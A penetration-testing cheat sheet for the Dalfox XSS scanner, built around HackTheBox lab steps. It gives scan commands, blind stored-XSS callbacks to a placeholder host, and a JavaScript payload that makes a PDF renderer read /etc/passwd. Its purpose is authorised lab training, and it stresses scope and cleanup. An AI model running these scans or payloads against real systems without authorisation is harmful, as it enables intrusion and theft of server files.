dalfox.md (26878B)
1 --- 2 title: "Dalfox" 3 description: "Dalfox XSS scanner usage for HTB and AEN: scan modes, pipelines, custom payloads, blind XSS and output handling." 4 category: web 5 tags: ["web", "xss"] 6 tools: [] 7 difficulty: intermediate 8 updated: "2026-08-28" 9 source: "vault:Web/Dalfox - HTB and AEN Cheat Sheet.md" 10 --- 11 # Dalfox — HTB and AEN Cheat Sheet 12 13 ## Summary 14 15 [Dalfox](https://github.com/hahwul/dalfox) automates XSS parameter discovery, reflection analysis, context-aware payload selection, DOM/AST analysis, and proof-of-concept generation. In AEN Note 5 its strongest fit is **Step 7**, where an authenticated support-ticket submission stores input that an administrator later renders. Capture the real ticket request in Burp, give Dalfox that raw request, restrict the scan, and use an out-of-band callback to detect the delayed execution. Dalfox is **not** the validator for Step 8's server-side PDF local-file-read chain; that requires the staged manual renderer tests in the dedicated Step 8 sheet. 16 17 > [!danger]+ Authorisation and Impact Boundary 18 > 19 > 1. Use these commands only in HTB, an intentionally vulnerable lab, or an explicitly authorised engagement. 20 > 2. XSS scanning sends executable markup and can create persistent records. Start with one target, low concurrency, and a harmless proof. 21 > 3. A blind callback proves code execution and outbound reachability. It does not require collecting cookies, page contents, credentials, or other victim data. 22 > 4. Do not scan logout, delete, purchase, administration, or other state-changing endpoints unless the test plan specifically permits them. 23 > 5. Remove stored test records and callback data when the exercise ends. 24 25 > [!tip]+ Related Notes 26 > 27 > 1. AEN source: 5 - Web Application Enumeration#Step 7 — support.inlanefreight.local (Blind XSS → Session Hijack) 28 > 2. AEN Step 7 explanation: Step 7 - Blind XSS Session Hijack Cheat Sheet 29 > 3. General XSS workflow: Cross-Site Scripting (XSS) - HTB Cheat Sheet 30 > 4. Blind-XSS operations: Blind XSS to Session Hijacking - HTB Cheat Sheet 31 > 5. Step 8 renderer chain: Step 8 - Tracking HTML Injection to Local File Read Cheat Sheet 32 33 --- 34 35 ## 1. What Dalfox Does 36 37 ### Pipeline in Plain Language 38 39 | Stage | Dalfox action | What the operator learns | 40 |---|---|---| 41 | Input parsing | Reads a URL, URL list, pipe, raw HTTP request, or HAR | Exactly which requests will be tested | 42 | Discovery | Extracts query/body/header/cookie inputs | Where controlled data can enter | 43 | Parameter mining | Looks for additional likely parameters | Inputs not obvious in the visible form | 44 | Probe | Inserts markers and special characters | Which values reflect and what survives | 45 | Context analysis | Identifies HTML, attribute, script, or DOM context | Which payload family fits the parser | 46 | Verification | Tests execution signals and analyses JavaScript/DOM | Whether the result is more than inert reflection | 47 | Reporting | Produces PoCs and structured output | Reproducible evidence for manual confirmation | 48 49 > [!important]+ Scanner Result Is the Start of Verification 50 > 51 > A reflected marker is not automatically XSS. Reproduce the smallest reported case in Burp or a browser, confirm where the value lands, and distinguish HTML injection, JavaScript execution, and actual impact. 52 53 ### Finding Labels 54 55 | Label | Meaning | Operator response | 56 |---|---|---| 57 | `V` | Vulnerable: the returned DOM parses with the payload in an executable position | Reproduce in a real browser and record the exact context | 58 | `A` | AST analysis found a JavaScript source-to-sink path | Inspect and exercise the client-side data flow manually | 59 | `R` | Reflected value | Determine whether encoding/context prevents execution | 60 | `I` | Informational observation | Use it to guide testing; do not report it as XSS alone | 61 62 --- 63 64 ## 2. Install and Confirm the CLI 65 66 This sheet targets the **Dalfox v3** command layout. Older v2 tutorials use commands such as `dalfox url`, `dalfox file`, and `dalfox pipe`; v3 puts these inputs under `dalfox scan`. 67 68 ### macOS 69 70 ```bash 71 brew install dalfox 72 dalfox --version 73 dalfox scan --help 74 ``` 75 76 Expected result: the version command prints the installed build, and the scan help lists URL/file/pipe/raw-HTTP/HAR inputs. Version text varies by release. 77 78 ### Cargo Alternative 79 80 ```bash 81 cargo install dalfox 82 dalfox --version 83 ``` 84 85 ### Quick Command Map 86 87 ```bash 88 dalfox --help 89 dalfox scan --help 90 dalfox payload --help 91 dalfox payload blind 92 ``` 93 94 | Command | Purpose | 95 |---|---| 96 | `dalfox scan ...` | Scan one or more HTTP requests for XSS | 97 | `dalfox payload ...` | Print payload families without scanning a target | 98 | `dalfox payload blind` | Show blind-XSS payload skeletons; `{}` represents the callback location | 99 | `dalfox server ...` | Run Dalfox as a service for integrations | 100 | `dalfox mcp ...` | Expose supported functionality through MCP | 101 102 --- 103 104 ## 3. Choose the Right Input Shape 105 106 ### Decision Table 107 108 | Starting material | Use | Why | 109 |---|---|---| 110 | One public GET URL | `--input-type url` | Fastest path for a simple query parameter | 111 | List of URLs | `dalfox scan urls.txt` | Batch mode with automatic file detection | 112 | Pipeline output | `... \| dalfox scan` | Consumes URLs generated by another tool | 113 | Authenticated POST from Burp | `--input-type raw-http` | Preserves cookies, CSRF token, method, body, and headers | 114 | Browser session/export | HAR input | Retains multiple captured browser requests | 115 | Blind stored form | Raw HTTP plus `--blind-oob` or `-b` | Injection and observation happen at different times | 116 117 ### Simple GET Discovery 118 119 First inspect how Dalfox interprets the target without running the full payload scan: 120 121 ```bash 122 dalfox scan --input-type url 'http://lab.local/search?q=aen-marker' --dry-run 123 ``` 124 125 Then scan the known query parameter conservatively: 126 127 ```bash 128 dalfox scan --input-type url 'http://lab.local/search?q=aen-marker' \ 129 -p q:query \ 130 --workers 2 \ 131 -r 2 \ 132 --only-poc v \ 133 --poc-type http-request 134 ``` 135 136 Expected result: Dalfox tests `q`, reports reflection/context information, and prints a proof only if it reaches the selected verified class. No finding is also a valid result; inspect whether authentication, context, or client-side rendering was missed. 137 138 ### Direct Form POST 139 140 ```bash 141 dalfox scan --input-type url 'http://lab.local/comment' \ 142 -X POST \ 143 -H 'Content-Type: application/x-www-form-urlencoded' \ 144 -d 'message=aen-marker' \ 145 -p message:body \ 146 --workers 1 \ 147 -r 1 148 ``` 149 150 | Fragment | Meaning | 151 |---|---| 152 | `-X POST` | Uses the same HTTP method as the form | 153 | `-d ...` | Supplies the form-encoded body | 154 | `message:body` | Restricts injection to the body field named `message` | 155 | `--workers 1` | Sends one worker's requests at a time | 156 | `-r 1` | Caps the request rate at one per second | 157 158 > [!warning]+ Do Not Guess Form Field Names 159 > 160 > The AEN page label is **Message**, but the underlying POST name is not shown in Note 5. Inspect the captured request. If it is `content=...`, use `content:body`; if it is `msg=...`, use `msg:body`. The visible label and HTTP name do not have to match. 161 162 --- 163 164 ## 4. Raw HTTP from Burp 165 166 Raw HTTP is the most reliable option for authenticated HTB forms. 167 168 ### Capture Procedure 169 170 1. Submit one normal, harmless ticket in the browser while Burp Proxy is recording. 171 2. Find the corresponding POST request in **HTTP history**. 172 3. Confirm it contains the expected host, path, cookie, content type, CSRF value, and form body. 173 4. Save the **request message only** as `support-ticket.txt` in a clean lab directory. 174 5. Replace real secrets in study notes, but keep the live lab file complete while testing. 175 6. Run the dry check below before active scanning. 176 177 Illustrative structure—the real request is authoritative: 178 179 ```http 180 POST /ticket.php HTTP/1.1 181 Host: support.inlanefreight.local 182 Cookie: session=REDACTED_LAB_SESSION 183 Content-Type: application/x-www-form-urlencoded 184 Connection: close 185 186 subject=aen-dalfox&ACTUAL_MESSAGE_PARAMETER=normal-test-message 187 ``` 188 189 ```bash 190 dalfox scan --input-type raw-http support-ticket.txt --dry-run 191 ``` 192 193 Expected result: Dalfox recognises one POST request and its body parameters. `--dry-run` validates the planned input; it does not prove XSS. 194 195 ### Restrict to One Known Parameter 196 197 After reading the raw body, optionally narrow the scan: 198 199 ```bash 200 dalfox scan --input-type raw-http support-ticket.txt \ 201 -p ACTUAL_MESSAGE_PARAMETER:body \ 202 --workers 1 \ 203 -r 1 204 ``` 205 206 If the name is still uncertain, omit `-p` and allow discovery, then use the output to choose the real parameter for the next run. 207 208 ### Through Burp for Visibility 209 210 ```bash 211 dalfox scan --input-type raw-http support-ticket.txt \ 212 --proxy http://127.0.0.1:8080 \ 213 --workers 1 \ 214 -r 1 215 ``` 216 217 This routes Dalfox traffic through Burp so each generated request can be inspected. Ensure Burp's listener is on `127.0.0.1:8080` and avoid intercepting every request unless you intend to step through them manually. 218 219 > [!failure]+ Raw Request Fails but Browser Works 220 > 221 > 1. Refresh expired cookies and CSRF tokens. 222 > 2. Verify the `Host` header resolves to the HTB target. 223 > 3. Preserve the original body encoding: form, JSON, or multipart. 224 > 4. Check whether the application requires a preceding request or one-time token. 225 > 5. Compare Dalfox traffic with a working browser request in Burp before changing payload flags. 226 227 --- 228 229 ## 5. AEN Step 7 — Blind Stored XSS 230 231 ### Why Normal Scanning Is Not Enough 232 233 The vulnerable support ticket is rendered later by an administrator or automated agent. The submission response cannot show the privileged DOM, so immediate reflection analysis may report little or nothing. The useful signal is a unique outbound callback created when the stored record is viewed. 234 235 <figure class="flow plate corners"> 236 <figcaption class="flow__cap"><span class="flow__kind">Blind stored XSS chain</span><span class="flow__dir">LR</span></figcaption> 237 <div class="flow__body"> 238 <div class="flow__diagram" data-dir="lr"> 239 <div class="flow-rank"><div class="flow-node is-entry">Burp captures normal ticket POST</div></div> 240 <div class="flow-edge"></div> 241 <div class="flow-rank"><div class="flow-node">Dalfox injects blind canary</div></div> 242 <div class="flow-edge"></div> 243 <div class="flow-rank"><div class="flow-node">Support app stores ticket</div></div> 244 <div class="flow-edge"></div> 245 <div class="flow-rank"><div class="flow-node">Admin agent opens ticket later</div></div> 246 <div class="flow-edge"></div> 247 <div class="flow-rank"><div class="flow-node">Payload requests unique OOB address</div></div> 248 <div class="flow-edge"></div> 249 <div class="flow-rank"><div class="flow-node is-goal">Callback proves execution and reachability</div></div> 250 </div> 251 </div> 252 </figure> 253 254 ### Option A — Dalfox-Managed OOB Check 255 256 ```bash 257 dalfox scan --input-type raw-http support-ticket.txt \ 258 --blind-oob \ 259 --blind-oob-wait 120 \ 260 --workers 1 \ 261 -r 1 \ 262 -f json \ 263 -o support-dalfox.json \ 264 --include-request 265 ``` 266 267 Line-by-line: 268 269 1. `--input-type raw-http` replays the authenticated form shape captured in Burp. 270 2. `--blind-oob` creates out-of-band payloads and monitors the default OOB service. 271 3. `--blind-oob-wait 120` keeps polling for two minutes after injection. 272 4. One worker and one request per second limit duplicate stored tickets and load. 273 5. JSON output preserves machine-readable evidence; `--include-request` records the triggering request. 274 275 Expected result after the support agent views the ticket: an OOB interaction correlated to a Dalfox payload. If the agent does not view the record within 120 seconds, the scan may end without a reported interaction even though the ticket remains stored. 276 277 > [!warning]+ Delayed Review Can Outlive the Scan 278 > 279 > The `--blind-oob-wait` value is only the post-scan polling window. A ticket opened ten minutes later needs a persistent collector whose logs remain available; increasing the wait indefinitely is not a substitute for planning the asynchronous workflow. 280 281 ### Option B — Persistent Callback You Control 282 283 ```bash 284 dalfox scan --input-type raw-http support-ticket.txt \ 285 -b 'https://UNIQUE-ID.YOUR-AUTHORISED-CALLBACK.example' \ 286 --workers 1 \ 287 -r 1 \ 288 -f json \ 289 -o support-blind.json \ 290 --include-request 291 ``` 292 293 Use an Interactsh, Burp Collaborator, or self-hosted lab endpoint that remains observable after Dalfox exits. Give every run a unique subdomain/path so a late callback can be tied to one field and timestamp. 294 295 ### Why `--sxss` Is Not the First AEN Choice 296 297 Dalfox's stored-XSS mode can submit to one endpoint and revisit a retrieval page: 298 299 ```bash 300 dalfox scan --input-type url 'https://lab.local/post-comment' \ 301 --sxss \ 302 --sxss-url 'https://lab.local/comments' 303 ``` 304 305 This works only when Dalfox can access the page that renders the stored value. In AEN Step 7 the important renderer is the admin ticket view, which is unavailable before session compromise. Therefore: 306 307 1. Use blind OOB detection first. 308 2. Treat the callback as the XSS proof. 309 3. Keep AEN's later session-impact demonstration manual and separate. 310 4. Do not call a missing `--sxss` result evidence that the ticket is safe. 311 312 ### AEN Evidence Ladder 313 314 | Observation | What it proves | What it does not prove | 315 |---|---|---| 316 | Ticket submission succeeds | Input reached storage workflow | The admin page rendered it | 317 | Dalfox reports reflection only | Value appeared in an immediate response | JavaScript execution in admin context | 318 | Unique HTTP/DNS callback | Stored payload was processed and could reach OOB service | Cookie access or admin identity by itself | 319 | Callback user agent/source matches support agent | Stronger execution-context correlation | Session theft or account takeover | 320 | Manual minimal admin action after authorised replay | Session impact | Password compromise or persistence | 321 322 ### Safe First Proof Versus AEN Escalation 323 324 Dalfox should first produce only an OOB execution canary. AEN's later `document.cookie` collection is a separate impact step documented in Step 7 - Blind XSS Session Hijack Cheat Sheet. Do not make sensitive collection the scanner's default: `HttpOnly` may correctly prevent reading the cookie, and XSS is still real even when no cookie is exposed. 325 326 --- 327 328 ## 6. AEN Step 8 — Dalfox Boundary 329 330 Step 8 injects HTML/JavaScript into a **server-side PDF renderer** and uses that renderer's local privileges to request `file:///etc/passwd`. This differs from ordinary reflected or stored browser XSS. 331 332 | Question | Step 7 support ticket | Step 8 tracking PDF | 333 |---|---|---| 334 | Who parses the input? | Admin/support browser | Server-side HTML-to-PDF worker | 335 | Where is output observed? | OOB callback and admin page | Generated PDF | 336 | Useful Dalfox mode | Raw HTTP plus blind OOB | At most input/reflection discovery | 337 | Reliable proof | Unique callback | Visible staged renderer output | 338 | Can Dalfox prove local file read? | Not applicable | No; inspect the generated PDF manually | 339 340 > [!important]+ Correct Tool Choice 341 > 342 > Dalfox may help locate a reflected tracking parameter, but it does not model the PDF generation/retrieval workflow or validate `file://` content inside the generated artifact. Follow Step 8 - Tracking HTML Injection to Local File Read Cheat Sheet: visible text/HTML first, harmless JavaScript second, then the authorised local-file request. Do not interpret “Dalfox found no XSS” as evidence that the renderer chain is safe. 343 344 The AEN payload: 345 346 ```html 347 <script> 348 x = new XMLHttpRequest; 349 x.onload = function () { 350 document.write(this.responseText) 351 }; 352 x.open("GET", "file:///etc/passwd"); 353 x.send(); 354 </script> 355 ``` 356 357 belongs in the tracking form field, not in Dalfox or a terminal. It creates a request **inside the PDF worker**, waits for the response, and writes that response into the rendered document. The important security assumption is the renderer's ability to access the `file://` scheme; a normal browser commonly blocks this cross-origin access. 358 359 --- 360 361 ## 7. AEN Note 5 Applicability Matrix 362 363 | AEN section | Main vulnerability class | Dalfox fit | Correct use or handoff | 364 |---|---|---|---| 365 | Initial vhost/screenshot triage | Asset discovery | Low | Use EyeWitness/gowitness; give Dalfox selected HTTP inputs later | 366 | Shop object access | IDOR | None | Compare object IDs and authorisation responses manually | 367 | Development upload | Verb tampering/file upload | None | Test methods, content controls, storage, and execution separately | 368 | Helpdesk | LFI | None | Use controlled path traversal/file-read tests | 369 | Status application | SQL injection | None | Use Burp/manual SQLi and sqlmap when justified | 370 | **Support Step 7** | **Blind stored XSS** | **High** | Raw authenticated POST plus OOB callback | 371 | **Tracking Step 8** | **PDF HTML injection → SSRF/file read** | **Limited** | Discovery only; validate generated PDF manually | 372 | VPN portal | Product/version/dead end | None | Fingerprint and move on when no supported path exists | 373 | External application | XXE | None | Use XML parser/entity testing | 374 | GitLab | Misconfiguration | None | Enumerate application configuration and access controls | 375 | Monitoring | Command injection | None | Use one-change shell-metacharacter probes and manual verification | 376 377 This matrix prevents a common mistake: choosing a scanner first and forcing every application into its vulnerability model. In Note 5, Dalfox is a specialist for the support XSS, not the general web-enumeration engine. 378 379 --- 380 381 ## 8. Parameters and Scope Controls 382 383 ### Parameter Locations 384 385 ```bash 386 -p q:query 387 -p message:body 388 -p profile:json 389 -p session:cookie 390 -p X-Forwarded-For:header 391 ``` 392 393 Supported locations include query strings, bodies, JSON, multipart fields, cookies, and headers. Use the location suffix when the same name could appear in more than one place. 394 395 ### Restrict Noise 396 397 ```bash 398 dalfox scan urls.txt \ 399 --include-url 'support\.inlanefreight\.local' \ 400 --exclude-url '/logout|/delete|/admin/action' \ 401 --ignore-param 'csrf,submit' \ 402 --workers 2 \ 403 --max-concurrent-targets 1 \ 404 -r 2 \ 405 --delay 500 406 ``` 407 408 | Flag | Effect | 409 |---|---| 410 | `--include-url` | Keeps only matching target URLs | 411 | `--exclude-url` | Removes dangerous or irrelevant paths | 412 | `--ignore-param` | Does not inject into listed parameters | 413 | `--workers` | Limits concurrent workers within a target | 414 | `--max-concurrent-targets` | Limits simultaneous targets | 415 | `-r` | Requests per second ceiling | 416 | `--delay` | Adds time between requests | 417 418 ### Discovery Controls 419 420 | Flag | Use when | 421 |---|---| 422 | `--dry-run` | Confirm input interpretation before scanning | 423 | `--only-discovery` | Map parameters/reflections without the normal exploitation phase | 424 | `--skip-discovery` | Parameters are already known and you want direct testing | 425 | `--skip-mining` | Avoid additional parameter guessing | 426 | `--deep-scan` | A normal authorised scan missed a complex context; expect more requests | 427 | `--hpp` | Testing HTTP parameter pollution is explicitly in scope | 428 429 --- 430 431 ## 9. Payload Strategy and PayloadsAllTheThings 432 433 ### Let Context Drive Payload Choice 434 435 Dalfox's generated payloads account for the observed parsing context and encodings. Useful controls include: 436 437 ```bash 438 dalfox scan 'http://lab.local/search?q=aen-marker' \ 439 -p q:query \ 440 -e url,html 441 ``` 442 443 Available encoders include `none`, `url`, repeated URL encoding, `html`, `htmlpad`, `base64`, `unicode`, and zero-width-space variants. More encoders create more traffic; use only those justified by the observed transform. 444 445 ### Local PATT Quick List 446 447 The local repository contains: 448 449 ```text 450 /Users/daemon1/git/PayloadsAllTheThings/XSS Injection/Intruders/xss_payloads_quick.txt 451 ``` 452 453 It currently contains 38 quick payload lines and is largely designed around visible `alert()`/`prompt()` proofs. Review it before use: 454 455 ```bash 456 sed -n '1,80p' '/Users/daemon1/git/PayloadsAllTheThings/XSS Injection/Intruders/xss_payloads_quick.txt' 457 ``` 458 459 Use it only on an interactive lab page where pop-ups and event-triggered payloads are acceptable: 460 461 ```bash 462 dalfox scan 'http://lab.local/search?q=aen-marker' \ 463 -p q:query \ 464 --custom-payload '/Users/daemon1/git/PayloadsAllTheThings/XSS Injection/Intruders/xss_payloads_quick.txt' \ 465 --workers 1 \ 466 -r 1 467 ``` 468 469 > [!warning]+ Why This Is Wrong for the AEN Ticket by Default 470 > 471 > A pop-up list creates many stored tickets, may interrupt the support agent, and does not provide reliable delayed correlation. For Step 7 use Dalfox's blind callback mode with one unique OOB identifier. Use PATT to understand candidate primitives, not as an unreviewed firehose. 472 473 ### Built-In Remote Collections 474 475 ```bash 476 dalfox scan 'http://lab.local/search?q=aen-marker' \ 477 --remote-payloads portswigger,payloadbox 478 ``` 479 480 This fetches supported remote sets; it is not a PATT integration. Record the source/version used so the test is reproducible, and apply the same scope/rate controls. 481 482 ### Replace Rather Than Supplement 483 484 ```bash 485 dalfox scan 'http://lab.local/search?q=aen-marker' \ 486 --custom-payload reviewed-lab-payloads.txt \ 487 --only-custom-payload 488 ``` 489 490 Without `--only-custom-payload`, custom lines supplement Dalfox's generated payloads. With it, only the reviewed file is used. This is useful when an engagement permits a narrowly approved payload set. 491 492 --- 493 494 ## 10. Output, Evidence, and Exit Codes 495 496 ### Human-Readable Markdown 497 498 ```bash 499 dalfox scan --input-type raw-http request.txt \ 500 -f markdown \ 501 -o dalfox-findings.md \ 502 --include-request \ 503 --include-response \ 504 --poc-type http-request 505 ``` 506 507 ### JSON for Later Review 508 509 ```bash 510 dalfox scan --input-type raw-http request.txt \ 511 -f json \ 512 -o dalfox-findings.json \ 513 --include-request 514 ``` 515 516 Supported formats include plain text, JSON, JSONL, Markdown, SARIF, and TOML. Include response bodies only when needed because they may contain sessions, personal data, or large amounts of content. 517 518 ### Exit-Code Meaning 519 520 | Exit code | Meaning | 521 |---|---| 522 | `0` | Scan completed with no findings | 523 | `1` | Findings were produced | 524 | `2` | Dalfox encountered an error | 525 526 An exit code of `1` is not a shell failure in the ordinary sense; it lets CI distinguish “finding present” from “no finding.” Always inspect the report before deciding severity. 527 528 ### Evidence Checklist 529 530 1. Dalfox version and exact command. 531 2. Sanitised raw request shape and parameter location. 532 3. Scope/rate settings. 533 4. Finding label and generated proof. 534 5. Manual reproduction in the correct browser/rendering context. 535 6. For blind XSS: unique callback ID, protocol, timestamp, source, and user agent. 536 7. A clear boundary between execution proof and impact proof. 537 8. Cleanup of stored records, reports, sessions, and callback data. 538 539 --- 540 541 ## 11. Troubleshooting 542 543 | Symptom | Likely cause | Next check | 544 |---|---|---| 545 | `dalfox: command not found` | Tool not installed or not on `PATH` | Install, then run `dalfox --version` | 546 | Old tutorial command fails | v2 `url/file/pipe` syntax copied into v3 | Use `dalfox scan` and select/auto-detect input type | 547 | Browser works, raw request gets `401/403` | Expired session/CSRF or missing header | Recapture a fresh working request in Burp | 548 | Many parameters/noise | Discovery too broad | Add `-p`, `--ignore-param`, `--skip-mining`, and URL scope | 549 | Reflection reported, browser does nothing | Value is encoded or lands in inert context | Inspect raw response and parsed DOM; reproduce the reported PoC | 550 | No blind callback | Not viewed, syntax mismatch, CSP, egress block, or polling ended | Correlate ticket storage, use a persistent unique callback, then wait for the authorised viewer | 551 | `--sxss` finds nothing in AEN | Retrieval URL is admin-only | Use blind OOB detection instead | 552 | Step 8 scan is negative | PDF worker is outside Dalfox's normal verification model | Run the staged PDF-renderer procedure manually | 553 | Scan overwhelms the lab | Defaults too concurrent for this workflow | Stop, reduce workers/targets/rate, and remove duplicate stored records | 554 555 --- 556 557 ## 12. Fast Runbooks 558 559 ### Reflected GET XSS 560 561 1. Start with a marker and inspect the response/DOM. 562 2. Run `--dry-run`. 563 3. Restrict to the known query parameter. 564 4. Scan at a low rate. 565 5. Reproduce only the smallest verified PoC. 566 567 ```bash 568 dalfox scan 'http://lab.local/search?q=aen-marker' \ 569 -p q:query \ 570 --workers 2 \ 571 -r 2 \ 572 --only-poc v \ 573 --poc-type http-request 574 ``` 575 576 ### Authenticated Form 577 578 1. Submit a normal form through Burp. 579 2. Save the working request as raw HTTP. 580 3. Confirm cookies, CSRF token, content type, and body. 581 4. Dry-run, then restrict the actual input name. 582 5. Proxy the scan through Burp if you need request-by-request visibility. 583 584 ```bash 585 dalfox scan --input-type raw-http request.txt \ 586 -p ACTUAL_PARAMETER:body \ 587 --proxy http://127.0.0.1:8080 \ 588 --workers 1 \ 589 -r 1 590 ``` 591 592 ### AEN Step 7 Blind Ticket 593 594 1. Capture one normal ticket POST. 595 2. Keep the session/CSRF state fresh. 596 3. Choose a unique, authorised OOB callback. 597 4. Run one worker at one request per second. 598 5. Keep the collector observable long enough for delayed admin review. 599 6. Record the callback as execution proof. 600 7. Follow the Step 7 sheet for separately authorised impact validation and cleanup. 601 602 ```bash 603 dalfox scan --input-type raw-http support-ticket.txt \ 604 -b 'https://UNIQUE-ID.YOUR-AUTHORISED-CALLBACK.example' \ 605 --workers 1 \ 606 -r 1 \ 607 -f json \ 608 -o support-blind.json \ 609 --include-request 610 ``` 611 612 --- 613 614 ## Lessons Learned 615 616 1. Raw HTTP avoids inventing parameter names and preserves authenticated request state. 617 2. Blind stored XSS is asynchronous; callback lifetime matters as much as payload syntax. 618 3. `--sxss` needs an accessible retrieval page, which AEN's pre-compromise admin workflow does not provide. 619 4. PATT expands payload knowledge, but Dalfox's context analysis should decide which syntax is worth testing. 620 5. A negative Dalfox result does not cover server-side PDF rendering, SQLi, IDOR, LFI, XXE, upload flaws, or command injection. 621 6. Reflection, execution, data access, and session impact are separate claims requiring separate evidence. 622 623 --- 624 625 ## References 626 627 1. [Dalfox — Official GitHub Repository](https://github.com/hahwul/dalfox) 628 2. [Dalfox — Installation](https://dalfox.hahwul.com/getting-started/installation/) 629 3. [Dalfox — CLI Reference](https://dalfox.hahwul.com/reference/cli/) 630 4. [Dalfox — Scanning Modes](https://dalfox.hahwul.com/guide/scanning-modes/) 631 5. [Dalfox — Stored XSS](https://dalfox.hahwul.com/guide/stored-xss/) 632 6. [Dalfox — Parameters](https://dalfox.hahwul.com/guide/parameters/) 633 7. [Dalfox — Payloads](https://dalfox.hahwul.com/guide/payloads/) 634 8. [Dalfox — Output](https://dalfox.hahwul.com/guide/output/) 635 9. [PayloadsAllTheThings — XSS Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md) 636 10. 5 - Web Application Enumeration#Step 7 — support.inlanefreight.local (Blind XSS → Session Hijack) 637 11. Step 7 - Blind XSS Session Hijack Cheat Sheet 638 12. Step 8 - Tracking HTML Injection to Local File Read Cheat Sheet